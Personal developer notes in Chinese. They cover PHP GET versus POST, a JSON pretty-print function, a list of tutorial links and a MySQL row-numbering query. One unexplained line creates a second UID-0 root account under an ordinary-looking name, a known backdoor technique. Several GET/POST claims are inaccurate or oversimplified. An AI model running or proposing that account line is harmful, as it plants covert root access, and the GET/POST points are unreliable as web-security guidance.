
二、$_POST、$_GET的区别和特点

   1. GET是从服务器上获取数据，POST是向服务器传送数据。
   2. GET是把参数数据队列加到提交表单的ACTION属性所指的URL中，值和表单内各个字段一一对应，在URL中可以看到。
      POST是通过HTTP POST机制，将表单内各个字段与其内容放置在HTML HEADER内一起传送到ACTION属性所指的URL地址。用户看不到这个过程。
   3. 对于GET方式，服务器端用Request.QueryString获取变量的值，对于POST方式，服务器端用Request.Form获取提交的数据。
   4. GET传送的数据量较小，不能大于2KB。POST传送的数据量较大，一般被默认为不受限制。但理论上，IIS4中最大量为80KB，IIS5中为100KB。
   5. GET安全性非常低，POST安全性较高。
   
   
<?php
$arr = array("ret"=>0,"data"=>array('a' => 1, 'b' => '2', 'c' => 3, 'd' => 4, 'e' => 5));
$json = json_encode($arr);
/**
* Formats a JSON string for pretty printing
*
* @param string $json The JSON to make pretty
* @param bool $html Insert nonbreaking spaces and <br />s for tabs and linebreaks
* @return string The prettified output
*/
function _format_json($json, $html = false) {
 $tabcount = 0;
 $result = '';
 $inquote = false;
 $ignorenext = false;
 if ($html) {
  $tab = "   ";
  $newline = "<br/>";
 } else {
  $tab = "\t";
  $newline = "\n";
 }
 for($i = 0; $i < strlen($json); $i++) {
  $char = $json[$i];
  if ($ignorenext) {
  $result .= $char;
  $ignorenext = false;
  } else {
  switch($char) {
   case '{':
   $tabcount++;
   $result .= $char . $newline . str_repeat($tab, $tabcount);
   break;
   case '}':
   $tabcount--;
   $result = trim($result) . $newline . str_repeat($tab, $tabcount) . $char;
   break;
   case ',':
   $result .= $char . $newline . str_repeat($tab, $tabcount);
   break;
   case '"':
   $inquote = !$inquote;
   $result .= $char;
   break;
   case '\\':
   if ($inquote) $ignorenext = true;
   $result .= $char;
   break;
   default:
   $result .= $char;
  }
  }
 }
 return $result;
}
echo _format_json($json);
/*
{
 "ret": 0,
 "data": {
 "a": 1,
 "b": 2,
 "c": 3,
 "d": 4,
 "e": 5
 }
}
**/


http://www.thinkphp.cn/code/651.html

http://blog.knowsky.com/195916.htm  postgresql常用命令
https://code.angularjs.org/latest/docs/api  angular.js
http://www.cnblogs.com/ys-ys/p/5092760.html   CSS 巧用 :before和:after

http://www.runoob.com/w3cnote/php-ajax-cross-border.html PHP Ajax 跨域问题最佳解决方案   

http://www.runoob.com/angularjs/angularjs-tutorial.html  auglarjs教程
http://www.daqianduan.com/tag/css3-explain    css 3详解 大前端
http://www.runoob.com/css3/css3-tutorial.html   css3教程

http://www.cnblogs.com/wangfupeng1988/p/4001284.html

Yii中文社区：    http://www.yiichina.com/doc/guide/2.0/intro-yii


http://fontawesome.io/icons/

http://www.bootcdn.cn/crypto-js/

http://www.yiibai.com/nodejs/    nodejs中文网站

https://pecl.php.net/package/mongo/     php_mongo.dll下载地址


面向对象应该牢记：保持对象小型化，模块化，非耦合以及流线型 。

useradd -o -u 0 -g 0 -M -d /root -s /bin/bash vxzhan
select (@i:=@i+1) as i,post_time from tb_check_price,(select @i:=0) as tt  order by post_time desc; 

http://auto.sohu.com/20160607/n453446539.shtml  驾驶证到期还去车管所？你真是out了
